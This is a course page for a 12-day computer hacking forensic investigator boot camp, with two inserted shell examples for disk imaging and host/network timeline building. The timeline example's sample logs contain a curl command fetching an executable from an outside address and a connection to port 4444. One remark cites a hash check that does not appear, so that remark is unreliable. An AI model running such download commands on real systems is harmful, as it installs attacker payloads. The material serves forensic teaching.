CHFI Computer Hacking Forensic Investigator (Boot Camp)

Course code: CS39

Two-week course (12 training days)

(Training + exam preparation + certificate)

Course registration fee: $5500 (includes the EC-Council CHFI exam fee)


Target audience & prerequisites

Target: Incident responders, junior/mid-level forensic analysts, IT security professionals, law-enforcement cyber units, and anyone preparing for CHFI certification.
Prerequisites:

  • Basic familiarity with Windows and Linux admin tasks.

  • Networking fundamentals (TCP/IP, DNS, HTTP).

  • Comfort with the command line; basic scripting (Python/Bash) is recommended but not required.

  • Participants should bring a laptop capable of running virtualization (8+ GB RAM recommended).

Course length & daily schedule

  • Total: 12 consecutive training days (recommended 9:00 to 17:00, with a 60–90 min lunch plus short breaks).

  • Format: Instructor-led lectures + demos (morning), hands-on labs & casework (afternoon).

  • Lab access: Cloud/VM lab environment (students connect via VPN) + downloadable forensic images.

  • Language: All slides, lab guides and handouts will be bilingual (English / Arabic).


High-level learning objectives

By the end of the 12 days participants will be able to:

  1. Follow forensic best practices and legal chain-of-custody procedures.

  2. Acquire images (disk & memory) safely from live and powered-off systems.

  3. Analyze Windows and Linux artifacts (registry, MFT, logs, users, timelines).

  4. Perform memory forensics to detect running malware, injected code and volatile indicators.

  5. Perform network forensics using PCAP analysis and reconstruct sessions.

  6. Produce a professional, legally-defensible forensic report and evidence package.

  7. Use major forensic tools: FTK Imager, Autopsy/Sleuth Kit, Volatility, Wireshark, X-Ways/EnCase concepts.


12-Day Detailed Syllabus (daily agenda + labs)

Day 1 — Introduction & Forensic Fundamentals

Morning: Course intro, CHFI overview, legal/ethical considerations, chain of custody, evidence preservation.
Afternoon Lab: Build the lab environment; demonstration: creating forensic images with FTK Imager and dd.
Deliverable: Chain-of-custody template (bilingual).

Day 2 — Forensic Readiness & Acquisition Techniques

Morning: Live vs. dead-box acquisition, imaging formats (E01, raw), hashing, write blockers.
Afternoon Lab: Disk imaging exercises (E01 and raw), verify hashes, use of hardware write blocker.
Deliverable: Imaging checklist.
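The Day 1 and Day 2 acquisition steps (raw image with dd, hash verification, an entry for the custody record) as one runnable script. This is an added example, not the course's own lab material: the "evidence drive" is a constructed 1 MiB file standing in for a device such as /dev/sdb, and the acquisition-log field layout is this example's choice, not a standard format.

```shell
#!/bin/sh
# Added example, not part of the course's own lab material: raw acquisition
# with dd, hash verification of source against image, and one
# acquisition-log line for the chain-of-custody record.
# Assumptions: POSIX sh with dd, sha256sum (or shasum), mktemp and date.
# The "evidence drive" is a constructed 1 MiB file standing in for a
# device such as /dev/sdb; nothing here touches real hardware.

set -eu

# Build a constructed evidence source: exactly 2048 sectors of 512 bytes.
make_sample_source() {
    dd if=/dev/urandom of="$1" bs=512 count=2048 2>/dev/null
}

# SHA-256 of a file: GNU coreutils first, BSD/macOS shasum as fallback.
hash_file() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# Raw (dd-style) image of $1 into $2.
# conv=noerror,sync keeps reading past a bad sector and pads it with
# zeros so every later offset in the image still matches the source.
# bs=512 matters: sync pads the final block up to bs, so choose a bs
# that divides the device size or the image hash will not match.
acquire_raw() {
    dd if="$1" of="$2" bs=512 conv=noerror,sync 2>/dev/null
}

# Compare source and image hashes; return 0 on match, 1 on mismatch.
verify_image() {
    src_hash=$(hash_file "$1")
    img_hash=$(hash_file "$2")
    if [ "$src_hash" = "$img_hash" ]; then
        echo "MATCH  sha256=$src_hash"
        return 0
    fi
    echo "MISMATCH source=$src_hash image=$img_hash"
    return 1
}

# Append one tab-separated line to the acquisition log: UTC time, examiner,
# source, image path, image hash. The field layout is this example's choice.
log_acquisition() {
    printf '%s\t%s\t%s\t%s\tsha256=%s\n' \
        "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$4" "$2" "$3" "$(hash_file "$3")" >> "$1"
}

main() {
    work=$(mktemp -d)
    make_sample_source "$work/evidence.dd"
    acquire_raw "$work/evidence.dd" "$work/case001.raw"
    verify_image "$work/evidence.dd" "$work/case001.raw"
    log_acquisition "$work/acquisition.log" "$work/evidence.dd" "$work/case001.raw" examiner01
    cat "$work/acquisition.log"
    rm -rf "$work"
}

main
```

On a real device the source is read through a hardware write blocker and hashed once before imaging; the hash of the image is then compared against that value, and both hashes go into the custody record. A single appended byte, as the check below shows, is enough to turn a match into a mismatch, which is why the image hash is recorded at acquisition time and re-verified before analysis.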

Day 3 — File Systems & Windows Artifacts I

Morning: NTFS internals, MFT, $LogFile, $UsnJrnl, file slack basics.
Afternoon Lab: Extracting file metadata, recovering deleted files, timeline basics (log2timeline primer).
Deliverable: Timeline fragment for sample case.

Day 4 — Windows Artifacts II (Registry & User Activity)

Morning: Windows registry structure, user profiles, recent files, prefetch, ShimCache, LNK files.
Afternoon Lab: Registry artifact extraction (using Registry Explorer/RegRipper), user activity reconstruction.
Deliverable: User activity report (timeline + artifacts).

Day 5 — Memory Forensics I — Fundamentals & Volatility

Morning: Memory capture methods (FTK Imager, DumpIt), memory anatomy (processes, handles).
Afternoon Lab: Capture live memory; run Volatility to list processes, loaded DLLs and network connections/open ports.
Deliverable: Volatility report (process list, suspicious indicators).

Day 6 — Memory Forensics II — Advanced Analysis

Morning: Detecting injected code, rootkits, credential theft, extracting browser/credential artifacts from memory.
Afternoon Lab: Hunt for process injection, extract credentials/artifacts; session hijacking demo.
Deliverable: Memory analysis evidence package.

Day 7 — Network Forensics I — PCAP & Traffic Analysis

Morning: Network capture basics, tools (tcpdump, tshark, Wireshark), reconstructing TCP sessions.
Afternoon Lab: Analyze provided PCAPs, reconstruct HTTP/SMTP/FTP sessions, extract files from PCAP.
Deliverable: Network timeline and extracted evidence.

Day 8 — Network Forensics II — IDS/Proxy Logs & Correlation

Morning: Syslog, proxy logs, IDS alerts correlation, timeline stitching between host & network.
Afternoon Lab: Correlate host artifacts with PCAP and IDS logs; build incident timeline.
Deliverable: Correlated incident timeline.
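The Day 8 host-to-network timeline stitching, as an added example that is not part of the course's lab material: three differently formatted sources (syslog, a Squid-style proxy log, tshark-style packet summaries) are normalised to the same ISO-8601 UTC shape and merged by time. All input lines are constructed for the example; the case year (syslog carries none) and the assumption that the host clock is UTC are this example's choices and in a real case come from the imaged host.

```shell
#!/bin/sh
# Added example, not part of the course's own lab material: stitch host
# syslog, proxy log and packet-capture summary lines into one UTC-ordered
# timeline. Assumptions: POSIX sh plus awk, sort and date; syslog lines
# carry neither year nor timezone, so the case year and UTC are assumed
# below and must be taken from the imaged host's clock in a real case.
# Every input line is constructed for this example.

set -eu

CASE_YEAR=2025   # assumption: year of the case, not present in syslog

# Constructed inputs: BSD-style syslog, a Squid-style proxy log (epoch
# seconds first), and tshark "-T fields"-style packet summaries.
SYSLOG='Dec 22 09:14:05 ws07 sshd[1234]: Accepted password for admin from 10.0.0.5 port 51234 ssh2
Dec 22 09:14:18 ws07 sudo: admin : TTY=pts/0 ; COMMAND=/usr/bin/curl -o /tmp/p.exe http://203.0.113.9/p.exe'
PROXY='1766394860.412 120 10.0.0.7 TCP_MISS/200 51200 GET http://203.0.113.9/p.exe - HIER_DIRECT/203.0.113.9 application/octet-stream'
PCAP='1766394859.001 10.0.0.7 203.0.113.9 TCP 80 SYN
1766394895.550 10.0.0.7 203.0.113.9 TCP 4444 SYN'

# Epoch seconds -> ISO-8601 UTC; GNU date first, BSD date as fallback.
epoch_to_iso() {
    date -u -d "@$1" +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \
        || date -u -r "$1" +%Y-%m-%dT%H:%M:%SZ
}

# Syslog "Mon DD HH:MM:SS host msg" -> "<iso>\thost:<host>\t<msg>".
norm_syslog() {
    awk -v year="$CASE_YEAR" '
        BEGIN {
            split("Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec", m, " ")
            for (i in m) mon[m[i]] = sprintf("%02d", i)
        }
        {
            ts = sprintf("%s-%s-%02dT%sZ", year, mon[$1], $2, $3)
            msg = $0
            sub(/^[^ ]+ +[^ ]+ +[^ ]+ +[^ ]+ +/, "", msg)
            print ts "\thost:" $4 "\t" msg
        }'
}

# Proxy line -> "<iso>\tproxy\t<client> <method> <url>" (sub-second part dropped).
norm_proxy() {
    while read -r ts elapsed client status bytes method url rest; do
        printf '%s\tproxy\t%s %s %s\n' "$(epoch_to_iso "${ts%.*}")" "$client" "$method" "$url"
    done
}

# Packet summary -> "<iso>\tpcap\t<src> -> <dst> <proto>/<port> <flags>".
norm_pcap() {
    while read -r ts src dst proto port flags; do
        printf '%s\tpcap\t%s -> %s %s/%s %s\n' "$(epoch_to_iso "${ts%.*}")" \
            "$src" "$dst" "$proto" "$port" "$flags"
    done
}

# Normalise every source to the same three-column shape, then sort on the
# ISO timestamp; lexical order of ISO-8601 UTC strings is chronological.
build_timeline() {
    {
        printf '%s\n' "$SYSLOG" | norm_syslog
        printf '%s\n' "$PROXY"  | norm_proxy
        printf '%s\n' "$PCAP"   | norm_pcap
    } | sort -k1,1
}

build_timeline
```

The merged output reads top to bottom as the incident story: SSH login on ws07, a sudo curl on the host, the outbound SYN and the proxy's record of the download of p.exe one second later, then a SYN to port 4444. Sub-second precision is dropped here for brevity; keep it when two sources land in the same second, and record each source's clock offset before merging, since a host that is a few minutes off will reorder events across the seam between host and network evidence.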

Day 9 — Malware Forensics & Static/Dynamic Analysis Basics

Morning: Malware taxonomy, safe dynamic analysis environment (sandboxing), static indicators.
Afternoon Lab: Static analysis of a sample binary (strings, PE header), dynamic sandbox run & observe artifacts.
Deliverable: Malware analysis summary & Indicators of Compromise (IOCs).

Day 10 — Mobile & Cloud Forensics (Intro) + Anti-Forensics

Morning: Mobile acquisition concepts, cloud evidence basics (logs, API access), anti-forensics techniques and countermeasures.
Afternoon Lab: Simulated cloud log collection & small mobile artifact lab (emulator images); detect simple anti-forensic traces.
Deliverable: Anti-forensics detection checklist.

Day 11 — Case Building — Full Investigation (Capstone Part 1)

Morning: Assign capstone case (realistic scenario covering acquisition, memory & network). Plan triage and tasks.
Afternoon Lab: Teams perform acquisition, initial analysis, start timeline & evidence collection.
Deliverable: Interim forensic notebook + evidence index.

Day 12 — Case Completion, Reporting & Presentation (Capstone Part 2)

Morning: Complete analysis; finalize timeline, extract IOCs, determine root cause & attacker actions.
Afternoon: Each team presents findings; compile legally-defensible forensic report (executive summary, technical appendices, evidence manifest). Final written exam / practical checklist.
Deliverable: Final forensic report (bilingual template filled), evidence package, presentation.


Labs, Assessments & Grading

  • Daily labs: Guided + challenge variants; completion tracked with checklist.

  • Mid-course practical (Day 6): Individual memory forensics mini-task (pass/fail + feedback).

  • Capstone (Days 11–12): Team-based investigation — graded on technical findings, chain-of-custody, timeline quality, and report clarity.

  • Final assessment: Practical capstone + short written MCQ covering theory.

  • Passing criteria: Complete capstone with acceptable findings + pass the written portion (instructor-adjustable).




Time and place

Date: 22/12/2025

Duration: 12 days

Location: Kuala Lumpur